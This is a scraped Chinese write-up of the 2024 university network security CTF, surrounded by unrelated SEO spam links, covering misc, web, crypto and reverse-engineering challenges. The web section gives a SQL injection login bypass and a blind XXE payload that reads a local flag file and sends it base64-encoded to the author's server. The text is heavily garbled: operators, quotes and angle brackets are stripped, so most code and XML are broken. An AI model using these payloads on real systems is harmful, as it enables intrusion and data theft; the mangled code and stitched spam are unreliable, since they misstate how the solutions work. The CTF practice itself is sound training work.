当前位置: 首页 > news >正文

vue配合什么做网站比较好百度一下网页搜索

vue配合什么做网站比较好,百度一下网页搜索,手机怎么跳过国家禁止访问,互联网域名是什么2024高校网络安全管理运维赛 文章目录 2024高校网络安全管理运维赛MISC签到考点#xff1a;动态图片分帧提取 easyshell考点#xff1a;流量分析 冰蝎3.0 Webphpsql考点#xff1a;sql万能钥匙 fileit考点#xff1a;xml注入 外带 Cryptosecretbit考点#xff1a;代码阅读…2024高校网络安全管理运维赛 文章目录 2024高校网络安全管理运维赛MISC签到考点动态图片分帧提取 easyshell考点流量分析 冰蝎3.0 Webphpsql考点sql万能钥匙 fileit考点xml注入 外带 Cryptosecretbit考点代码阅读理解 频率分析 REeasyre考点base64换表 babyre考点UPX脱壳Z3求解 MISC 签到 考点动态图片分帧提取 没啥好说的给了一个动态的flag 所以用在线或者StegServer工具都可以分帧提取 然后按照图片所述上cyberchef rot13解密 easyshell 考点流量分析 冰蝎3.0 打开后过滤一下http 追踪http流 先分析一下特征发现是冰蝎3 判断条件参考https://blog.csdn.net/pingan233/article/details/129168134 Accept字段 Accept: text/html,image/gif, image/jpeg, *; q.2, */*; q.2 UserAgent字段 (这个图是在网上搜的版权原因师傅们可以自行搜索一下网上都有 长连接 到此确定为冰蝎3 然后去翻到下面看返回的数据需要对其发送请求的内容进行解密 冰蝎3主要就两层加密如下 AES BASE64解密 https://blog.csdn.net/weixin_46081055/article/details/120007338 其中AES的密钥一般是默认的e45e329feb5d925b iv全设置为0 去一点点追踪http流看看解密后内容 主要是看蓝色返回包内容 从少的开始 从后往前 AES 注意这段非常重要 继续往上 检测到压缩包PK开头特征 提取zip 直接按右边的保存即可提取成功 两个文件 secret1 和 secret2在一个压缩包里 但是都需要密码 在往上走 其中对最后两个解密 第一个是secret2.txt 第二个是temp.zip 这和我们的提取出来的非常一致啊 就这几个信息 还能干嘛 回忆我们之前拿到一段奇怪的明文 推测这就是secret2.txt的内容 而我们的flag就是secret1的内容 那么这个压缩包已知其中一个文件内容利用已知明文攻击上工具bkcrack 首先构造一下文件目录 测试了 know.zip放的内容如上 构造命令 bkcrack -C download.zip -c secret2.txt -P know.zip -p secret2.txt其中-C表示密文cipher-p为明文plaintext明文和密文中明文的部分对应这么说是因为上午试过了把secret.txt或者整个压缩包作为密文然后都找不出key 然后-C应该是指外层文件-c应该是内层文件 拿到key后的下一步 解到新的zip文件中 并自己设置密码为happysu bkcrack -C download.zip -k key -U flag.zip happysu在flag.zip中拿下 参考https://blog.csdn.net/Rick66Ashley/article/details/130015948 Web phpsql 考点sql万能钥匙 开题是一个登录界面起初的思路是sql注入队友试了时间盲注和布尔盲注 但是很慢也报不出来看着解数增长的这么快我们感觉可能是思路错了应该是想复杂了那就试试万能钥匙吧 下面是解题思路 首先随便测一个 可以去注册既然出题人写了注册功能肯定要给我们什么信息吧 注册好后登录可以发现需要登录一个admin用户 结合题目描述 你能成为管理员吗 可以确定需要作为admin用户登录 先尝试一下对用户名采用万能钥匙 败了 那么 非常新颖的思路来了确定用户名是admin 所以对密码进行万能钥匙 不能有空格 故输入||1# 登录成功直接拿下 不过关于这题还要补充一下其实在真实场景中对密码进行这样的sql注入是不合理 的毕竟绝大多网站都会把密码转md5加密后存储 fileit 考点xml注入 外带 首先开题就一个非常直白的界面 CtrlU 看一下 非常明显的提示但是我不懂搜一下 不是很理解 呜呜 问一下gpt simplexml_import_dom() 函数用于将 DOM文档对象模型节点转换为 SimpleXML简单 XML节点。DOM 是一种树状结构表示 XML 文档的完整内容而 SimpleXML 则是 PHP 中一种简单且易于使用的 XML 解析器允许开发者使用面向对象的方式轻松地处理 XML 数据。 与 XXEXML 外部实体注入相关的内容是在处理 XML 数据时可能遇到的安全问题。XXE 攻击利用 XML 解析器的功能通过向 XML 文档中插入恶意实体来获取敏感信息或执行远程代码。在 PHP 中SimpleXML 解析器对外部实体默认是启用的这意味着如果应用程序在处理用户提供的 XML 数据时不小心暴露了 XML 解析器就有可能成为 XXE 攻击的目标。 此外其实看到这个函数 可以一眼定XML外部实体注入 且无回显因为漏洞源码如下 ?php $xmlfilefile_get_contents(php://input); $domnew DOMDocument(); $dom-loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); $xmlsimplexml_import_dom($dom); $xxe$xml-xxe; $str$xxe \n; ?所以我们来尝试一下XML外部实体注入 界面没什么回显 就是XML外部实体注入 使用payload直接梭 注意把ip换成自己服务器的 发包内容 !DOCTYPE convert [ !ENTITY % remote SYSTEM http://192.168.134.128/eval.xml %remote;%payload;%send; ]自己的服务器上接收数据 eval.xml !ENTITY % file SYSTEM php://filter/readconvert.base64-encode/resourcefile:///d:/flag.txt !ENTITY % payload !ENTITY #x25; send SYSTEM http://192.168.134.128/?content%file;参考来源http://tttang.com/archive/1716/#toc__6 其实一开始可以先读个file:///etc/passwd 测试一下 那么接下来是对浏览器抓包 这里其实当时踩坑了 因为题目环境一开始不出网 所以根本没法打 后面重启了一下才可以 抓包后修改一下请求包类型 起初content-Type是没有的 改成这样 个人踩坑: httpd 也就是nginx没启动 没设置开机自启 启动命令 systemctl status nginx #状态 systemctl start nginx #启动查看服务器访问日志 拿下: Crypto secretbit 考点代码阅读理解 频率分析 题目 from secret import flag from random import randrange, shuffle from Crypto.Util.number import bytes_to_long from tqdm import tqdmdef instance(m, n):#随机性start list(range(m))shuffle(start)for i in range(m):now start[i]this_turn Falsefor j in range(n-1):if now i:this_turn Truebreaknow start[now]if not this_turn:return 0return 1def leak(m, n, times2000):message [instance(m, n) for _ in range(times)]return messageMAX_M 400 MIN_M 200 #把flag转成整形 然后再转为二进制 flag_b [int(i) for i in bin(bytes_to_long(flag))[2:]] leak_message []for bi in tqdm(flag_b):#对每一个二进制位操作#生成合适的tmp_m0 n0 m1 n1while True:# m 200 - 400# n 100 - 356tmp_m0 randrange(MIN_M, MAX_M)tmp_n0 randrange(int(tmp_m0//2), int(tmp_m0 * 8 // 9))tmp_m1 randrange(MIN_M, MAX_M)tmp_n1 randrange(int(tmp_m1//2), int(tmp_m1 * 8 // 9))if abs(tmp_m0-tmp_m1-tmp_n0tmp_n1) MAX_M // 5:breakchoose_m tmp_m0 if bi 0 else tmp_m1choose_n tmp_n0 if bi 0 else tmp_n1leak_message.append([[tmp_m0, tmp_n0], [tmp_m1, tmp_n1], leak(choose_m, choose_n)])#需要做的是 每一个flag的bit位都会生成一组泄露数据 # 我们知道tmpm0和tmpn0 以及 tmpm1和tmpn1 需要通过leak的0 1值 去恢复 choose_m 和 choose_n open(data.txt, w).write(str(leak_message))解题 其中注释都是自己加的虽然一开题还是有点懵的但是这个题作为我这种菜鸡密码人的唯一的倔强ai那个根本看不懂只能来好好分析一下咯 先写一点小demo进行测试一下instance函数在干什么 首先是对于shuffle start list(range(10)) print(start) shuffle(start) #直接打乱 不需要接收 print(start)result [0, 1, 2, 3, 4, 5, 6, 7, 8, 9] [2, 1, 4, 5, 3, 8, 0, 7, 6, 9]这个对题目也没有什么影响了解一下就好 下面是最关键的 我们知道tmpm0和tmpn0 以及 tmpm1和tmpn1 需要通过leak的0 1值 去恢复 choose_m 和 choose_n到底是等于哪个 所以我们把tmpm0和tmpn0 以及 tmpm1和tmpn1 都跑一遍这个leak函数 看看结果 两次结果来对比一下哇靠一模不一样啊 这打个集贸啊 思考思考必须恢复那我们要看看频率了 看看1和0的频率 针对0和1统计频率 你能想到什么必然是求和非常方便 可以发现频率是比较稳定的 看看另一个 其实差距还是蛮大的 所以说 判断的方法就是 两个都自己本地leak一次 得到频率 然后读取题目泄露的数据 得到真实的频率 两个自己生成的看看哪个接近 就能判断当前的bit位是谁啦 exp from random import randrange, shuffle from Crypto.Util.number import bytes_to_long from tqdm import tqdmdef instance(m, n):#随机性start list(range(m))shuffle(start)for i in range(m):now start[i]this_turn Falsefor j in range(n-1):if now i:this_turn Truebreaknow start[now]if not this_turn:return 0return 1def leak(m, n, times2000):message [instance(m, n) for _ in range(times)]return messagewith open(data.txt, r) as file:# 读取文件中的数据data file.read()# 将读取的字符串数据转换为列表 注意这是一个三元组 leak_message eval(data)flag_b [] #对flag的每一个bit泄露进行操作 for bit in leak_message:m0 bit[0][0]n0 bit[0][1]m1 bit[1][0]n1 bit[1][1]res sum(bit[2])res0 sum(leak(m0, n0))res1 sum(leak(m1, n1))#如果0接近if abs(res0 - res) abs(res1 - res):flag_b.append(0)else:flag_b.append(1)print(.join(flag_b))print(.join(flag_b))10min左右 拿下 a 0b110011001101100011000010110011101111011011101000110100001101001011100110101111100110001011100110101111101110100011010000110010101011111011100110100010101100011011100100110010101110100010111110110011000110001011000010110011101111101 b int(a) print(long_to_bytes(b)) #bflag{this_1s_the_sEcret_f1ag}RE easyre 考点base64换表 开题 shiftF12 打开字符串 一眼定 base64换表 babyre 考点UPX脱壳Z3求解 开题一看 这么几个函数必定加壳了 用exeinfo查一下 发现是UPX壳 用给出的命令脱壳 同样先shiftF12查看一下字符串 找到非常吸睛的flag 显然有四个加密点需要我们去恢复只要恢复回来就会直接输出flag 注意我们的目的是让每个函数都返回0 避免跳转到LABEL_7 Part1 第一部分的条件非常清晰 a1 - 0xADB1D018 0x36145344Part2: (a1 | 0x8E03BEC3) - 3 * (a1 0x71FC413C) a1 0x902C7FF8Part3 a1 0x100000004 * ((~a1 0xA8453437) 2 * ~(~a1 | 0xA8453437)) -3 * (~a1 | 0xA8453437) 3 * ~(a1 | 0xA8453437)- (-10 * (a1 0xA8453437) (a1 ^ 0xA8453437)) 551387557Part4: 11 * ~(a1 ^ 0xE33B67BD) 4 * ~(~a1 | 0xE33B67BD)- (6 * (a1 0xE33B67BD) 12 * ~(a1 | 0xE33B67BD)) 3 * (a1 0xD2C7FC0C) -5 * a1- 2 * ~(a1 | 0xD2C7FC0C) ~(a1 | 0x2D3803F3) 4 * (a1 0x2D3803F3)- -2 * (a1 | 0x2D3803F3) 0xCE1066DC注意上面的a1不一定是最终的a4 因为参数不一样 使用z3求解器 from z3 import * s Solver() a4 BitVec(a4, 32) a1 BitVec(a1, 32) a2 BitVec(a2, 32) a3 BitVec(a3, 32) s.add( a1 - 0xADB1D018 0x36145344) s.add( (a2 | 0x8E03BEC3) - 3 * (a2 0x71FC413C) a2 -1876131848 ) s.add( 4 * ((~a3 0xA8453437) 2 * ~(~a3 | 0xA8453437)) -3 * (~a3 | 0xA8453437) 3 * ~(a3 | 0xA8453437) - (-10 * (a3 0xA8453437) (a3 ^ 0xA8453437)) 551387557 ) s.add(11 * ~(a4 ^ 0xE33B67BD) 4 * ~(~a4 | 0xE33B67BD) - (6 * (a4 0xE33B67BD) 12 * ~(a4 | 0xE33B67BD)) 3 * (a1 0xD2C7FC0C) -5 * a1 - 2 * ~(a1 | 0xD2C7FC0C) ~(a1 | 0x2D3803F3) 4 * (a1 0x2D3803F3) - -2 * (a1 | 0x2D3803F3) 0xCE1066DC)if s.check() sat:print(s.model()) else:print(???? ERROR)直接梭了 result [a3 78769651,a4 2341511158,a2 98124621,a1 3821413212]拿下flag{e3c6235c-05d9434d-04b1edf3-8b909ff6}
http://www.hkea.cn/news/14266022/

相关文章:

  • 徐州建网站北京网站建设优化
  • 做鞋原料网站网站title keyword description
  • h5响应式网站是什么意思请人建网站应注意什么
  • 合肥思讯网站建设惠州网站建设技术托管
  • 比较好的做网站薪水最高的十大专业
  • 厦门关键词优化网站手机网站设计标准
  • 镇江做网站甘肃第三建设集团公司
  • 南昌网站建设方案服务专业的高端网站制作公司
  • 网站邮件推送电子商务网站需要做那些准备工作
  • 33岁改行做网站建设品牌推广怎么做
  • 网站建设后台管理国内优秀vi设计案例
  • 西安 医疗网站制作知更鸟wordpress 怎样
  • 免费私人网站启东建设网站
  • 织梦音乐网站网站域名授权怎么做
  • 有什么网站可以做电子版邀请函北京建设工程交易信息平台
  • 长沙网站seo推广上海红酒网站建设
  • 福永网站开发只能用域名访问WordPress
  • 7个湖北seo网站推广策略logo网站
  • 有做lol直播网站织梦对比wordpress
  • 工程在哪个网站做推广比较合适大气扁平网站
  • 双域名网站2345网址导航官网官方电脑版
  • 河北沧州泊头做网站的电话六安电子商务网站建设
  • 常州网站支付通道建设中国设计品牌网
  • 做网站常用代码向右浮动怎么写湖南住房和城乡建设网站
  • 电子商务网站 费用珠海市官网网站建设价格
  • 哪个网站能接效果图做2016响应式网站模版
  • 快飞建站做网站界面尺寸
  • 如何查网站域名备案兼职做国外网站钻前
  • 成都最专业做网站的姑苏网站建设
  • 做百科发那些网站新闻好网站引导图